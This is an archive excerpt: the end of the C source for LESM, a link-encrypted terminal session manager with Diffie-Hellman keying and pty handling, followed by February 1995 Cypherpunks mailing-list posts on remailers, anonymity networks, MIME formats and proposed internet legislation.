	  	if (strchr("0123456789abcdef!",ibuf)!=NULL) {
	  		bad=0;
	  		if ((c = cipherout(ibuf)) >= 0) {
	  		      	ch=c;
                                if (ch!=filler)
	  			      	bwrite(fpmaster,&ch,1);
	  		}
	  	} else if (bad++ > 16) {
	  		delkey();
	  		bwrite(stdout,"XXXXXXXXXXXXXXXX",16);
	  		if (paranoid)
	  		      	done();
	  		state=TRANS;
	  	} else
	  		ciphstate=0;
	  	break;
	    case KEYWAIT:
	  	if (strchr("0123456789abcdef:",ibuf)!=NULL) {
			masterkeyin(ibuf);
		} else {
			delkey();
			bwrite(stdout,"XXXXXXXXXXXXXXXX",16);
			if (paranoid)
				done();
			state=TRANS;
		}
		break;
	}
}

int pubstat=0;
int pubpos=0;
unsigned char pubbyte=0;
int pksize = -1;

startsession()
{
	static unsigned char buf[5] = {0177, '~', 0177, '~', 'L'};
	static unsigned char colon=':';
	int i;

	pklen=dhparams[LONG].primeLen;
	printf("Starting remote side of %d bit key exchange.\r\n",pklen*8);
	if (createdh(LONG) < 0)
		return -1;
	bwrite(stdout,buf,5);
	for (i=0; i<pklen; i++)
		sendhex(stdout,ourpub[i]);
	bwrite(stdout,&colon,1);
	pksize=LONG;
	pubstat=0;
	pubpos=0;
	pubbyte=0;
	state=KEYWAIT;
	return 0;
}

sltranspub(len)
{
	static unsigned char colon=':';
	int i;
	
	printf("\r\nStarting local key exchange.\r\n");
	for (i=0; i<len; i++)
		sendhex(fpmaster,ourpub[i]);
	bwrite(fpmaster,&colon,1);
	printf("entering ENCRYPTED mode; type ctrl-^ to escape\r\n");
}

masterkeyin(c)
     char c;
{
	int bits;

	if (c==':') {
		if (pubpos!=(pklen+2)) /* +2 for trailing checkword */
			goto abort;
		if (mcalckeys(pksize)<0) /* also verifies */
			goto abort;
		ciphstate=0;
		state=CIPHER;
		return;
	} else if (pubpos<MAXPUBKEY) {
		bits=atoh(c);
		if (bits<0)
			goto abort;
		if (pubstat) {
			pubbyte |= bits;
			otherpub[pubpos]=pubbyte;
			pubpos++;
		} else {
			pubbyte = bits<<4;
		}
		pubstat = 1-pubstat;
		return;
	}
    abort:
	bwrite(stdout,"XXXXXXXXXXXXXXXX",16);
	if (paranoid)
		done();
	state=TRANS;
}

int mcalckeys(len)
     int len;
{
	int i;
	
	if (dhagree(len)<0) /* sets up session keys */
		return -1;
	for (i=0; i<8; i++) {
		ivin[i]=0;
		ivout[i]=0xff;
	}
	if (cfb8_decrypt(otherpub[pklen]) ||
	    cfb8_decrypt(otherpub[pklen+1]))
		return -1;
	return 0;
}

int slcalckeys(len)
     int len;
{
	int i;
	
	if (dhagree(len)<0) /* sets up session keys */
		return -1;
	for (i=0; i<8; i++) {
		ivout[i]=0;
		ivin[i]=0xff;
	}
	ourpub[pklen]=cfb8_encrypt(0);
	ourpub[pklen+1]=cfb8_encrypt(0);
	return 0;
}

initslkey(param)
     int param;
{
	if ((param<0) || (param>2))
		return -1;
	pklen=dhparams[param].primeLen;
	pksize=param;
	pubstat=0;
	pubpos=0;
	pubbyte=0;
}

slkeyin(c)
     char c;
{
	int bits;

	if (c==':') {
		if (pubpos!=pklen)
			goto abort;
		if (createdh(pksize)<0)
			goto abort;
		if (slcalckeys(pksize)<0)
			goto abort;
		sltranspub(pklen+2);
		ciphstate=0;
		sloutstate=SL_CRYPT;
		return;
	} else if (pubpos<MAXPUBKEY){
		bits=atoh(c);
		if (bits<0)
			goto abort;
		if (pubstat) {
			pubbyte |= bits;
			otherpub[pubpos]=pubbyte;
			pubpos++;
		} else {
			pubbyte = bits<<4;
		}
		pubstat = 1-pubstat;
		return;
	}
    abort:
	bwrite(stdout,"X",1);
	state=SL_START;

}



int cipherout(ch)
     char ch;
{
	int bits;
	
	if (ch=='!') {
		ciphstate=0;
		return -1;
	}
	bits=atoh(ch);
	if (ciphstate) {
		ciphbyte |= bits;
		ciphstate=0;
		return(cfb8_decrypt(ciphbyte));
	} else {
		ciphbyte = bits<<4;
		ciphstate=1;
		return -1;
	}
}

int ciphercalcin(ch)
     unsigned char ch;
{
	static unsigned char iv[8];
	static unsigned int cbuf;
	int c;
	int i;

	c = atoh(ch);
	switch (cstate) {
	    case IV0:
		for(i=0; i<8; i++)
			iv[i]=0;
		cbuf = (c&0xf)<<4;
		cstate=IV1;
		return '.';
	    case IV1:
		cbuf = cbuf | (c&0xf);
		iv[7]=cbuf;
		cstate=IV2;
		return '.';
	    case IV2:
		cbuf = (c&0xf)<<4;
		cstate=IV3;
		return '.';
	    case IV3:
		cbuf = cbuf | (c&0xf);
		iv[6]=cbuf;
		cstate=C0;
		return '.';
	    case C0:
		cbuf = (c&0xf)<<4;
		cstate=C1;
		return '.';
	    case C1:
		cbuf = cbuf | c&0xf;
		c=cfb8_decrypt(cbuf);
		cstate=C0;
		if (isprint(c)) {
			bwrite(fpmaster,&c,1);
			return '_';
		} else {
			return '?';
		}
	    default:
		return '?';
	}
}

#include <sys/wait.h>

void
finish()
{
	union wait status;
	register int pid;
	register int die = 0;

	while ((pid = wait3((int *)&status, WNOHANG, 0)) > 0)
		if (pid == subchild)
			die = 1;

	if (die)
		done();
}

dooutput()
{
	register int cc;
	int i;
	unsigned char obuf[512];
	
	if ((cc = read(master, obuf, 512)) > 0) {
		switch (mode) {
		    case REMOTE:
			for (i=0; i<cc; i++)
				domasterout(obuf[i]);
			break;
		    case LOCAL:
			for (i=0; i<cc; i++)
				doslaveout(obuf[i]);
			break;
		    default:
			for (i=0; i<cc; i++)
				bwrite(stdout, &obuf[i], 1);
			break;
		}
		fflush(fpmaster);
		fflush(stdout);
	} else
		done();
}

domasterout(obuf)
     unsigned char obuf;
{
	int c;
	static int count=0;
        struct timeval tv;
	
	switch (state) {
	    case CIPHER:
		c=cfb8_encrypt(obuf);
		if (!(++count % 8))
			bwrite(stdout,"!",1);
		sendhex(stdout,c);
        	tv=tvPause;
                select (FD_SETSIZE,NULL,NULL,NULL,&tv);
		break;
	    case TRANS:
		bwrite(stdout, &obuf, 1);
		break;
	    default:
		/* throw away since i/o screws up keying */
		break;
	}
}


doslaveout(obuf)
     unsigned char obuf;
{
	static int bad=0;
	int c;
	char ch;
	
	switch (sloutstate) {
	    case SL_START:
	   	bwrite(stdout, &obuf, 1);
	   	if (obuf==0177)
	   		sloutstate=SL_GOT1;
	   	break;
	    case SL_GOT1:
	   	bwrite(stdout, &obuf, 1);
	   	if (obuf=='~')
	   		sloutstate=SL_GOT2;
	   	else
	   		sloutstate=SL_START;
	   	break;
	    case SL_GOT2:
	   	if (obuf==0177)
	   		sloutstate=SL_GOT3;
	   	else {
	   		bwrite(stdout, &obuf, 1);
	   		sloutstate=SL_START;
	   	}
	   	break;
	    case SL_GOT3:
	   	if (obuf=='~')
	   		sloutstate=SL_GOT4;
	   	else {
	   		bwrite(stdout, &obuf, 1);
	   		sloutstate=SL_START;
	   	}
	   	break;
	    case SL_GOT4: /* key size indicator */
	   	bwrite(stdout, &obuf, 1);
	   	if (obuf=='S') {
	   		initslkey(SHORT);
	   		sloutstate=SL_KEYING;
	   	} else if (obuf=='M') {
	   		initslkey(MEDIUM);
	   		sloutstate=SL_KEYING;
	   	} else if (obuf=='L') {
	   		initslkey(LONG);
	   		sloutstate=SL_KEYING;
	   	} else
	   		sloutstate=SL_START;
	   	break;
	    case SL_KEYING:
	   	if (strchr("0123456789abcdef:",obuf) != NULL) {
	   		slkeyin(obuf);
	   	} else {
	   		bwrite(stdout,"U",1);
	   		sloutstate=SL_START;
	   	}
	   	break;
	    case SL_CRYPT:
	   	if (strchr("0123456789abcdef!",obuf) != NULL) {
	   		bad=0;
	   		if ((c = cipherout(obuf))>=0) {
	   			ch=c;
                                if (ch!=filler)
		   			bwrite(stdout,&ch,1);
	   		}
	   	} else if (bad++ > 8) {
	   		fprintf(stderr,"\r\nEncrypted session terminated -");
	   		fprintf(stderr,"\r\npress enter for CLEARTEXT mode: ");
	   		waitenter();
	   		delkey();
	   		sloutstate=SL_START;
	   	} else
	   		ciphstate=0;
	   	break;
	    default:
	   	bwrite(stdout, &obuf, 1);
	   	break;
	}
}



doshell() 
{
	int t;

	/***
	t = open(_PATH_TTY, O_RDWR);
	if (t >= 0) {
		(void) ioctl(t, TIOCNOTTY, (char *)0);
		(void) close(t);
	}
	***/
	getslave();
	(void) close(master);
	(void) dup2(slave, 0);
	(void) dup2(slave, 1);
	(void) dup2(slave, 2);
	(void) close(slave);
	if (cmd==NULL)
		execl(shell, "sh", "-i", 0);
	else
		system(cmd);
	perror(shell);
	fail();
}

rawtty()
{

	struct termios sbuf;

        sbuf = tt;
        sbuf.c_iflag &= ~(INLCR|IGNCR|ICRNL|IXON);
        sbuf.c_oflag &= ~OPOST;
        sbuf.c_lflag &= ~(ICANON|ISIG|ECHO);
        sbuf.c_cc[VMIN] = 1;
        sbuf.c_cc[VTIME] = 0;
	(void) tcsetattr(0, TCSAFLUSH, &sbuf);
}

cookedtty()
{
	(void) tcsetattr(0, TCSAFLUSH, &tt);
}

fail()
{

	(void) kill(0, SIGTERM);
	done();
}

done()
{
	cookedtty();
	switch (mode) {
	    case REMOTE:
		if (state==CIPHER)
			printf("XXXXXXXXXXXXXXXX\n");
		printf("lesm remote ");
		break;
	    case LOCAL:
		printf("lesm local ");
		break;
	}
	printf("done\n");
	exit(0);
}

getmaster()
{
	char *pty, *bank, *cp;
	struct stat stb;

	pty = &line[strlen("/dev/ptyp")];
	for (bank = "pqrstuvwxyz"; *bank; bank++) {
		line[strlen("/dev/pty")] = *bank;
		*pty = '0';
		if (stat(line, &stb) < 0)
			break;
		for (cp = "0123456789abcdef"; *cp; cp++) {
			*pty = *cp;
			master = open(line, O_RDWR);
			if (master >= 0) {
				char *tp = &line[strlen("/dev/")];
				int ok;

				/* verify slave side is usable */
				*tp = 't';
				ok = access(line, R_OK|W_OK) == 0;
				*tp = 'p';
				if (ok) {
					(void) tcgetattr(0, &tt);
				    	(void) ioctl(0, TIOCGWINSZ, 
						(char *)&win);
					return;
				}
				(void) close(master);
			}
		}
	}
	fprintf(stderr, "Out of pty's\n");
	fail();
}

getslave()
{

	line[strlen("/dev/")] = 't';
	slave = open(line, O_RDWR);
	if (slave < 0) {
		perror(line);
		fail();
	}
	(void) tcsetattr(slave, TCSAFLUSH, &tt);
	(void) ioctl(slave, TIOCSWINSZ, (char *)&win);
	(void) setsid();
	(void) ioctl(slave, TIOCSCTTY, 0);
}

waitenter()
{
	unsigned char b;
	do {
		read(0,&b,1);
	} while (b!='\r');
	printf("\r\n");
}

sendhex(fp,c)
     FILE *fp;
     unsigned int c;
{
	static char buf[16];

	sprintf(buf,"%02x",c);
	bwrite(fp,buf,2);
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Thu, 9 Feb 95 18:43:40 PST
To: Cypherpunks@toad.com
Subject: Re: web pages sucking secrets from your hard drive
Message-ID: <v03001424ab6082e37022@[140.174.229.220]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:13 2/9/95, jltocher@CCGATE.HAC.COM wrote:

>While you're connected to your favorite Web page, it's also connected
>to you, and could be copying all sorts of information off your hard
>drive, say industry experts.

Wrong.

>In fact, it happened last year when
>Central Point Software used registration software developed by
>Pipeline Communications

Can you tell the difference between a web session and an installer?

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
      You couldn't get a clue during the clue mating season in         |
 a field full of horny clues if you smeared your body with clue musk   |
           and did the clue mating dance. - Edward Flaherty            |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Thu, 9 Feb 95 23:12:39 PST
To: cypherpunks@toad.com
Subject: Re: Selection key crypto protocol trial balloon
Message-ID: <gate.as70Zc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Hal <hfinney@shell.portal.com>:
> Let me get straight where we are.  Rishab's concrete proposal was not an
> implementation, but rather a set of requirements.  There was no
> suggestion about any specific algorithms that would meet those
> requirements, right?  The question is whether any such algorithm could
> exist.

Right.

> It is hard for me to see how this could possibly work.  The message
> receiver sends this "selection key" to the intermediary, and that somehow
> pulls out the saved message, but in a form such that the intermediary
> doesn't recognize it.  And the intermediary himself can't tell exactly
> which message is produced.  But it is nevertheless exactly the message
> which was meant for this particular receiver.

It need not be the same information - i.e. if the encryption process adds 
enough noise to the message, the extraction process might by lossy, without 
any total loss for the receiver. This may be possible particularly if 
Fourier-style transforms are used, as the "selection key" could pick up 
less "frequencies" of a message than are stored at the intermediary.

> The thing is, the receiver does not have much more information than the
> intermediary.  

The same could be said of a private/public key pair. What is crucial is the
association between the keys.

This said, while I can imagine separate systems for the intermediary loosing 
correlation between incoming and outgoing messages (eg - it's _really_ tough,
without fancy pattern recognition, to associate a JPEG with the original), 
and for generating three associated keys (secret splitting? something to do
with Brands' blind signatures?), I really can't imagine a way of putting it
all together. Someone will have to be inspired, as Diffie was...


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Martin ( frodo ) <g4frodo@cdf.toronto.edu>
Date: Thu, 9 Feb 95 16:23:46 PST
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: S.314 on Web
Message-ID: <95Feb9.192339edt.2438@marvin.cdf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The text of S.314 (the pi bill, as Doug pointed out to me earlier
today -- why I didn't realise earlier...) is available at
	http://baldric.resnet.cornell.edu/frodo/s.314.txt.html
with a rapidly hypertextified version of Slowdog's text on what
the bill will do to American law at
	http://baldric.resnet.cornell.edu/frodo/s.314.changes.html

   If there are errors or omissions, please tell me. If the URLs
are wrong, the failsafe is my homepage,
	http://baldric.resnet.cornell.edu/frodo/frodo.html
which has links to both. (Really. They're there. There's some
bumf about me. But the links are there.)

This may be useful to some. I find it handier to have it there
than in an odd text file lying around here.

frodo =)


Richard Martin    ChemPhysCompSci 9T7+PEY = 9T8   g4frodo@cdf.toronto.edu
Trinity College University of Toronto SVW92 martinrd@gpu.utcc.toronto.edu
My opinions, when not poached. (or fried) frodo@uhura.trinity.toronto.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQCVAgUBLzqwH6+lG3+zwTCVAQEGfwP+MOSWEAB2kbbabdai/y3o6QIDIWNefRle
UPTCVyqadfIIs7s8bJjymlJs/OCutm76Pdfst8U40Tpi4DcE6NGyuLe9TauHkQEf
+wFtgOYrju35YV/pdiXvIBmdnv8etthbtLA+b0KcaRVEKXVYP2NsZ7+WBT/gAVV1
XPbBwe1UJXw=
=kaQ8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: slowdog <slowdog@wookie.net>
Date: Thu, 9 Feb 95 17:01:10 PST
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <199502092258.RAA02881@libws2.ic.sunysb.edu>
Message-ID: <Pine.LNX.3.91.950209195950.9468A-100000@chewy.wookie.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> > prosecutins will stick. Arrests and prosecutions will take a financial 
> > toll on those targetted, and will create a chillinf effect in the online 
> > community, meaning sysops and BBS operators will start policing 
> > themselves too severely in an effort to avoid politcial or legal scrutiny.
> 
> Exactly. It's already happening. I've noticed on local BBS's they are afraid
> of conversation about controversial subjects or files having to do with
> things like do-it-yourself-birth control methods, drug legalization, or
> crypto... some of the networks like RIME are also jittery about certain
> topics like crypto or how telephones work.

Which might the time is ripe for a sort of user-to-user and 
sysop-to-sysop outreach effort, an attempt to create a sort of solidarity 
amongst users of the various extant networks to stand together in 
supporting the free exchange of information.

> > broadcast paradigm, while the online world operates within the network 
> > paradigm. There are no hours in which it is safe to broadcast because 
> > there is no "broadcast" in the tradition sense.
> 
> Yes, I was discussing broadcasting. Scary thought is that because networks
> are different they will try to outright ban everything.

I wonder though sometimes if it's even occurred to lawmakers that they 
can't apply the safe harbor notion for indency to computer networks.


- dog






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 9 Feb 95 17:58:22 PST
To: Eric Merth <emerth@gpu.srv.ualberta.ca>
Subject: Re: So, what's it all about?
In-Reply-To: <199502100127.SAA82871@gpu2.srv.ualberta.ca>
Message-ID: <Pine.SUN.3.91.950209205700.28249A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 9 Feb 1995, Eric Merth wrote:

> Date: Thu, 9 Feb 1995 18:27:04 -0700 (MST)
> From: Eric Merth <emerth@gpu.srv.ualberta.ca>
> To: cypherpunks@toad.com
> Subject: So, what's it all about?
> 
> I went to a UNIX trade show yesterday, and the main speaker was a 
> security type. He talked about "the cypherpunks" among other things.
> He said you are really scary and dangerous and ...
> But of course he had to also project this adress (cypherpunks@toad.com)
> on the screen.
> 
> So are you really scary and dangerous? What are the cypherpunks?

Only to totalatarian dictator types who want to control the flow and 
access to information.

Did he cite reasons for our scaryness or just slander us generally?

> 
> Just curious,
> 
> -EWM
> 

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <dshayer@netcom.com> (David Shayer)
Date: Thu, 9 Feb 95 21:07:18 PST
To: cypherpunks@toad.com
Subject: Re: Not necessarily crypto but scary anyway...
Message-ID: <v02110101ab60a4d6d80d@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


>A friend advises me that today House Bill 666 passed. This supposedly would
>allow police officers to use evidence collected illegaly if they 'believed'
>that it was collected in good faith.
>
>Any word on it?

Yes, this bill is real, and it passed the house resoundingly.  (I don't
know if the bill number is accurate.)  According to the ny times, the
republicans have been trying to pass this for a long time, and now they
control congress.

Interestingly, the ATF and IRS are specifically excluded!  The bill was
opposed by both civil liberties groups and gun nuts.  (Hope I don't offend
too many gun nuts.)  The ATF was excluded as a sop to the NRA I suppose.


During debate, Rep. John Dingell (MI) called the ATF "jackbooted American
fascists."  Way to go John!

David


+------------------------------------------------------------------------+
|David Shayer                                 dshayer@netcom.com         |
|Sentient Software / Symantec                 shayer@applelink.apple.com |
|"Shoot Newt."                                                           |
+------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 9 Feb 95 18:48:28 PST
To: cypherpunks@toad.com
Subject: RE: a new way to do anonymity
Message-ID: <ab60837505021004ea5d@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:51 PM 02/09/95, Wei Dai wrote:
>It seems to me that if a user maintains a 24-hour a day pipe to an
>uncompromised server, then the method I described earlier against
>remailers should not work against that user.  Otherwise, some kind of
>in-out statistical analysis may work.

Ay, what a good point.  I know this connection is incredibly obvious, but
just in case no one has yet made it, I will.  A "pipe-net" host running
Wei's L- modification to Matt's ESM, which was also running a remailer,
would provide pretty much untraceable entrance to the remailer net.  The
remailer software wouldn't even need to be integrated with the pipe
software in any way, as long as the user had a secure connection to the
host, he could just connect to the SMTP port and send the message to the
remailer that way.

I would guess that the attack Wei described, as well as almost every other,
if not every other, traffic analysis attack would fail if users were
utilizing this.  You could trace the message to a given "pipe net" host
using traffic analysis, but you wouldn't be able to trace it to a user, if
he was using the pipe net appropriately.  Obviously, this also requires a
sufficient number of people to be using the pipe net host, so that no real
information is gained just by tracing the connection to a given pipenet
host.  And of course non-pipe-net users are using the remailer on the
machine to, which makes things a tiny bit more complicated for the traffic
analysits

Note also that the bandwith could be kept extremely low.  Even something
like 10cps.  So, maybe it takes you up to a couple hours to actually
transit your message to the pipe-net host remailer,  but we currently dont'
expect instantaneous remailernet transmission anyway.  We've learned to
live with latency on the order of hours, as opposed to seconds, so adding
several more hours onto the chain isn't a problem.  And with a bandwith
maintained that low, the pipenet host could theoretically host many many
"pipe net remailer" client users, without causing a serious problem.

This seems like a really exciting thing to me.  That we already have the
tools available for, right now at this very second, now that Wei has done
the link encryption mod to ESM.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and Billionaires and Babies)
Date: Thu, 9 Feb 95 19:58:32 PST
To: cypherpunks@toad.com
Subject: Re: LESM - Link Encrypted Session Manager (3rd try)
Message-ID: <199502100354.WAA15146@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199502100243.AA03571@mail.eskimo.com>,
Wei Dai <weidai@eskimo.com> wrote:
>I tried to distribute LESM to the cypherpunks mailing list twice, and 
>neither of them made it to the nntp.hks.com list archive (my 
>laster posts HAVE).  What is going on here?  This is a second repost.

nntp.hks.*net*.  hks.com is someone else.

We were off-line for several hours today, so it's possible that they're
still sitting in a mail queue somewhere.  Netcom is our denial of
service provider, colluding with NyNex... 'nuff said.
- - --
Todd Masco     | "Don't be too proud of this technological terror you've
cactus@hks.net |   constructed."        - Darth Vader   
     Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzqp4xNhgovrPB7dAQGrxAP+Ota+9gBiOGmkE0XLxiIcLlE+rq0FMvcg
STYMFJPZbGc0QymyNZWWIQrFZS5yo7Zr8hRmmw6a/h3+MjzioiWvDJzDFdmPhwNd
CAvlvfAV97ZC4sYqc+KeeLjjxEGXpUbUQFbcKe4KAqx4XG6UXtWseeGbz+ZzSstu
iP1KSx5Oznw=
=QaIT
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzrjMCoZzwIn1bdtAQF6rQF/e9K678EztVO+4lr/oH+POXVFZm4Eg8ao
4DqXfTkbQ+fpnWHacueth1/9xFrt8RJd
=s71u
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Date: Thu, 9 Feb 95 22:57:19 PST
To: Hal <cypherpunks@toad.com
Subject: Re: MIME based remailing commands
Message-ID: <ab60b81304021004b962@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<SNIP my comments>
>Ah, I see how you are doing it.  Having re-read your docs, I gather
>that when un-armored the file is in an encrypted binary format, and
>when decrypted at least the non-header portion of the file is still
>binary?  I think this is a good way to do it; it addresses the point
>Eric made recently about size expansion when an armored file is
>encrypted at each step.
>
That is about right. Inside the armor is a bunch of binary data. 20 header
blocks, and the message block. The first message block is a PGP encrypted
to the remailer, and contains the next destination. The other 19 headers,
and the message block are IDEA encrypted with a key and IV in the first
header. When decrypted, the second header is seen to be PGP encrypted to
the next remailer, and the rest is encrypted with the key in that header.
The remailer Shifts up all the headers, sticks junk in the 20th header, and
rearmors the whole thing.

This is rather more active manipulation than the current remailers.


>The one thing I would mention is that "::" was not originally intended
>as an indication that the message was to be remailed.  Rather, this was
>simply a "header pasting token" which could be used to move a few lines
>from the body up into the header for those people who can't set header
>fields on outgoing mail.  Then the presence of "Anon-To:" or whatever
>in the header is what actually causes the action.  So you don't need to
>use "::", you can just set your headers directly and get the same
>effect.  (This is not to say you need to do it like this, just that
>that is how the original design that Eric created worked.)
>

I realize that. It was easy to implement, since I already had to check for
:: to be compatible with type 1 messages.

>If you did want to follow this model, you could think about using a
>MIME header to indicate the type of the message contents rather than
>the "::".  Another alternative would be to use a different special
>field in the mail header, like perhaps your "Remailer-Type: 2.0", but
>I'm not sure that a new top-level header field is the right place for
>this.  It looks to me like most of the standard headers deal more with
>moving the message around rather than with telling what would be done
>with it on receipt.  It's kind of a fine line but it looks to me like
>more of a job for a MIME content type since that is really what it is
>for.  You could use something like:
>
>MIME-Version: 1.0
>Content-Type: application/remail; version="2.0"
>
>or
>
>MIME-Version: 1.0
>Content-Type: application/remail-mark-2
>
>Then the rest of the message could look just as you have it.  Or, to use
>a little more of the existing standard, you could add:
>
>Content-Transfer-Encoding: base64
>
>and take out your BEGIN and END lines since it looks like you are using
>base64, although the augmented kind that PGP uses with the CRC at the
>end; you'd have to lose the CRC in that case.  (I wonder if PGP will do
>that in the MIME-PGP integration draft that is supposedly being worked
>on.)
>
>One question is, how do you actually send your messages in the
>mixmaster client and servers?  Do you go directly to sendmail, or do
>you use a user agent like /bin/mail?  If the former then it doesn't
>seem like it would be too hard to add these header fields.  On the
>receiving end then hopefully also it would not be much harder to match
>the Content-Type: string than the one you are using.
>
>The advantage, again, is that to a considerable extent this kind of
>application is exactly what MIME was planning for with the "application"
>content-type.  This lets you mark the contents of the message in a
>standard way.  And you are already using something very close to the
>base64 encoding that MIME specifies.  So this does seem like a good
>opportunity to go with the internet mainstream by following this
>standard.  If this seems like something you want to do I'm sure our MIME
>experts here can tell how to define a new content type.
>
>Hal
>

I agree that changing mixmaster to search for a MIME line, rather than the
:: would be no effort at all.

I use sendmail for the client and the remailer (actually they are the same
code), so adding new headers is easy. Unfortunately I am having some
problems with sendmail. Sendmail is marking the messages as "Apperently
To:" rather than "To:". Any idea what might cause that?

I am not sure I want to give up the CRC on the armor (esp. since I am using
the PGP tools routines and not my own), but I would be interested in
defining a new MIME content type. So, experts, what all is involved in
that, and is there any problem with starting to use a MIME type before it
is official?

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBLzsIElVkk3dax7hlAQFlmgP9FNxSrabWU7CyiRu1Kv28Lz2htuukq1Ul
ANG4y/arJ9gseBvOxDKVDLVKWN1c2XyOKrEbUTVXxHDhk/WwhfpvJE/UrVWQuFEP
eaFZB4G1xBvyjkx+DoQxsLVTEVcF1V54Mo5tfARBGCqf7aHqQGoLiRu8kR6i04fj
nPgOrMeE5Bk=
=vg7R
-----END PGP SIGNATURE-----

--------------------------------------------------
Lance Cottrell  who does not speak for CASS/UCSD
loki@nately.ucsd.edu
PGP 2.6 key available by finger or server. Encrypted mail welcome.
Home page http://nately.ucsd.edu/~loki/
Check out my essay on the next generation remailer Mixmaster on the WWW page.
For anon remailer info, mail remailer@nately.ucsd.edu Subject: remailer-help

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 10 Feb 95 00:25:51 PST
To: cypherpunks@toad.com
Subject: stupid legislation in Oregon
Message-ID: <199502100806.AA02116@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Ugh. This has been a stupid week. Oregon House bill 2319 was introduced
by Rep. (Kevin?) Mannix on 1/16/95, and referred to the House committee
on Commerce on 1/18/95. Rep. Mannix has also introduced another bill, 
HB 2310, which "Creates the crime of electronically furnishing obscene
material to minors; punishes by maximum one year imprisonment,
$10,000 fine, or both." HB 2310 was introduced 1/13/95, and referred
to the House Judiciary committee on 1/16/95. 

He's introduced 38 bills so far this session - including others re
mandatory minimum sentencing for felony convictions, one which appears
to bar surrogate-pregnancy agreements, and another (HB2303) which 
prohibits physicians from performing artificial insemination on an
unmarried woman.

Damn this fucking state. I'll be on the phone with my representative
in the morning to see if I can find out more. Westlaw's legislative
tracking database doesn't have much information.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzsecH3YhjZY3fMNAQH9DwP9GA1oai9JA2ftMSCLKH+jnfqxD/svI0ZD
N1yWpHwStmoZ3x6fr9MRpqFIwAfsTzfj+P0B07HBy1V53pVhKw+bFyCZZ+/ZmA7u
lAXR/eR6xr53ZMZJt2SSsFElE8VB8syjJRWe48a37q+3Ma9iGhvlfLx5IuX+qZR7
E9de+WMg/Pw=
=rOtS
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peterb@telerama.lm.com (Peter Berger)
Date: Thu, 9 Feb 95 21:15:50 PST
Subject: Re: Da Judge-L FAQ -- We are not Amused
In-Reply-To: <199502090712.XAA14865@alkahest.isas.com>
Message-ID: <3hesqj$cqn@ivory.lm.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199502090712.XAA14865@alkahest.isas.com>,
joshua geller  <alkahest!joshua@dee.retix.com> wrote:
>here come de judge:
>>   The so-called Cypherpunks List, having been a party to this illegal
>>   and "most heinous" distribution, is hereby invited to appear in our
>>   Chambers on the morning of Tuesday, 29 February, 1995, at a place of
>>   our choosing. Defense will be heard, and then the guilty will be
>>   punished.
>
>yes. a fair trial and a speedy execution.

"Like a dog," thought Joseph K.

-- 
......................................................................
  Peter G. Berger, Esq.  Telerama Public Access Internet, Pittsburgh
Internet: peterb@telerama.lm.com Phone: 412/481-3505 Fax: 412/481-8568
	   	 	http://www.lm.com/~peterb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Thu, 9 Feb 95 23:02:22 PST
